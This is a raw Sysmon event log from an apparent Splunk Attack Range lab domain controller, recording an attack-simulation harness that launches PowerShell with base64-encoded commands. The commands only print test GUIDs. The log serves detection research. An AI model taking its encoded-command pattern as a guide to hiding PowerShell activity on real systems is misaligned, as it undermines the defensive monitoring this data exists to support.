y\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49a232(wow64) 154100x80000000000000002235250Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.452{05ADC7E1-6D45-603E-63AA-00000000AD01}9500C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Encoded VwByAGkAdABlAC0ASABvAHMAdAAgAGEANgAyADYAMAA1AGMAYgAtADcANAA4AGUALQA0AGQANgA5AC0AYQA5AGYANQAtADUAYQAxAGEAYQA3AGMAMQAyADAAYQA0AA==C:\Users\Administrator\Downloads\AtomicTestHarnesses\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000002235249Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.423{05ADC7E1-6D45-603E-62AA-00000000AD01}4828ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002235248Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.323{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D45-603E-62AA-00000000AD01}4828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235247Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.323{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D45-603E-62AA-00000000AD01}4828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235246Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.278{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D45-603E-62AA-00000000AD01}4828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235245Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.278{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D45-603E-62AA-00000000AD01}4828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002235244Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:52:21.246{05ADC7E1-6D45-603E-62AA-00000000AD01}4828\PSHost.132591775411615488.4828.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002235243Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.223{05ADC7E1-6D45-603E-62AA-00000000AD01}4828ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_fdbthms3.c33.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235242Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.223{05ADC7E1-6D45-603E-62AA-00000000AD01}4828ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_nuetktv3.nth.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002235241Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.219{05ADC7E1-6D45-603E-62AA-00000000AD01}4828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_nuetktv3.nth.ps12021-03-02 16:52:21.219 10341000x80000000000000002235240Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.200{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-6D45-603E-62AA-00000000AD01}4828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235239Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.153{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6D45-603E-62AA-00000000AD01}4828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235238Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.153{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235237Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.153{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235236Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.153{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235235Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.153{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235234Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.153{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6D45-603E-62AA-00000000AD01}4828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002235233Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.153{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6D45-603E-62AA-00000000AD01}4828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+700132a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b43b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49ac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49a232(wow64) 154100x80000000000000002235232Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.161{05ADC7E1-6D45-603E-62AA-00000000AD01}4828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Encode VwByAGkAdABlAC0ASABvAHMAdAAgADUAOQBmADYAZQA3ADIAYQAtAGUAMAA0AGUALQA0ADcANwBlAC0AOQBkADgAZAAtADcAYQA2AGUAMwBiAGIAYwAxAGYAMgBlAA==C:\Users\Administrator\Downloads\AtomicTestHarnesses\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000002235231Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.137{05ADC7E1-6D44-603E-61AA-00000000AD01}14396ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235230Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.106{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5044C844A6EC6BAB1CFD9361209CA3CE,SHA256=4604690FE83F37E9B1FEE21AE38440D990E07FACA1E55864CAA55F232E4F4923,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235229Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.075{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA287AA5599D92692B604AD7B36A2CC1,SHA256=5338BA22D434B60D547229B9C97BA1831BBEB71A4DFDF485C0AEE418A358A896,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002235228Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.023{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D44-603E-61AA-00000000AD01}14396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235227Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.023{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D44-603E-61AA-00000000AD01}14396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002235359Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.981{05ADC7E1-6D46-603E-68AA-00000000AD01}2712ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_ff2p1qxu.wep.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235358Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.981{05ADC7E1-6D46-603E-68AA-00000000AD01}2712ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_gc4022gz.q4c.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002235357Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.965{05ADC7E1-6D46-603E-68AA-00000000AD01}2712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_gc4022gz.q4c.ps12021-03-02 16:52:22.965 10341000x80000000000000002235356Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.950{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-6D46-603E-68AA-00000000AD01}2712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002235355Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.950{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BFD3F1CD55E76C3C12954D6DF781B76,SHA256=51F391C48D466B603DCAA93E3A9FDD511094F4037920E40AB04776FDABD96FB1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002235354Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.921{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6D46-603E-68AA-00000000AD01}2712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235353Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.919{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235352Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 